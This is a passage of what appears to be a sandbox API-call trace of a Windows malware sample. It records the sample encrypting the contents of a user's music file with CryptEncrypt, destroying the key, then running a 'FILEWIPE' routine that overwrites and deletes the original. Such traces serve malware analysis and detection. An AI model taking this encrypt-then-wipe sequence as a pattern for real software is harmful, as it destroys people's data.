pdwDataLen=0x6ae220*=0x187d4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x187e0) returned 1 [0037.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0037.444] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.444] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.444] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.445] CharLowerBuffW (in: lpsz="byte[100321]", cchLength=0xc | out: lpsz="byte[100321]") returned 0xc [0037.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.447] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.449] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x965fc8*, pdwDataLen=0x6ae220*=0x187d4, dwBufLen=0x187e0 | out: pbData=0x965fc8*, pdwDataLen=0x6ae220*=0x187e0) returned 1 [0037.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.450] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.453] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.453] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.453] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.453] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.461] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.461] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.461] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.467] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.468] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.468] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.468] CryptDestroyKey (hKey=0x7c2280) returned 1 [0037.468] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.468] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.468] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.468] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.468] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.468] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.468] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.468] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.468] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.468] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.469] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.469] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.469] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.469] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.469] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.469] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.469] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.469] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.470] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.470] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.470] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.470] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.470] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.471] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.471] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x965cd70, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0x7c2100 [0037.471] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.472] CharLowerBuffW (in: lpsz="byte[100308]", cchLength=0xc | out: lpsz="byte[100308]") returned 0xc [0037.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.472] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.472] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.472] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.472] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.472] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.472] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.472] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.473] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5kw9-9bv3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.473] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.473] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.474] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.474] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.474] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.474] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.474] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.475] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.475] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFilePart=0x0) returned 0x31 [0037.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x160aab40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0x7c2100 [0037.475] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5kw9-9bv3.m4a")) returned 1 [0037.478] 